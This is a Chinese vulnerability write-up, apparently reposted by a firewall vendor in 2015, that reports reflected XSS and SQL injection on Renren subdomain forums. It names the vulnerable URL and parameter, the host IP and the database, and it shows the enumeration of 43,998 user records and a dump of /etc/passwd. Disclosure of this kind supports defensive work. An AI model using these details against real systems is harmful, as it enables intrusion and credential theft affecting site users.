English
 电子信箱
 加入收藏

  威盾防火墙 >> 新闻中心 >> 威盾新闻 >> 人人网分站SQL注入+反射型xss

 

人人网分站SQL注入+反射型xss

威盾防火墙 2015-01-26

 
1.人人某bbs。 2.反射型跨站,可获取cookie。 3.sql注入,多个注入点,information_schema.columns可用,注入很方便。 4.很多个数据表,select count(*) from XXX_用户表,结果:43998。 5.可读取系统文件,例如/etc/passwd(其他的路径没找到)。 起因是发现人人网某分站的phpinfo()(这个没有找到其他什么) http://yxzb4.renren.com/index.php 结果发现,wooyun里面有提交了的,只是没处理。 http://www.wooyun.org/bugs/wooyun-2010-07040 结果偶然间,爬行到另外一个站,是一个游戏论坛。 http://yxzb.renren.com/bbs/ 发现存在反射型xss,可获取cookie http://yxzb.renren.com/bbs/viewthread.jsp ?extra= &tid=9525 人人网分站SQL注入+反射型xss 其中几个页面都存在注入,其中一个注入信息: Target: http://yxzb.renren.com/bbs/faq.jsp?action=message&id=24 Host IP: 111.1.20.155 Web Server: Apache-Coyote/1.1 DB Server: MySQL >=5 Current DB: jsprun 可查看系统信息: 人人网分站SQL注入+反射型xss 注入的信息: 好多个数据库: 人人网分站SQL注入+反射型xss 执行查询语句,查询用户,43998(网站上显示信息:主题: 31695, 帖子: 304040, 会员: 43998) select count(*) from jrun_members 人人网分站SQL注入+反射型xss 用户名,密码,邮箱,salt.... 人人网分站SQL注入+反射型xss 读取/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync ...略 未测试是否可以拿到shell

相关内容: 最新内容:
人人网分站SQL注入+反射型xss[2015-01-26]
记一次成功的SQL注入入侵检测附带SQL性能优化[2015-01-26]
如何防止SQL注入[2015-01-26]
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)[2015-01-26]
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)[2015-01-26]
SQL SERVER 2k SP2 12命令的溢出攻击[2015-01-24]
人人网分站SQL注入+反射型xss[2015-01-26]
记一次成功的SQL注入入侵检测附带SQL性能优化[2015-01-26]
如何防止SQL注入[2015-01-26]
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)[2015-01-26]
PHP开发中常见的安全问题详解和解决方法(如Sql注入、CSRF、Xss、CC等)[2015-01-26]
黑客之CC攻击的思路及防范方法[2015-01-26]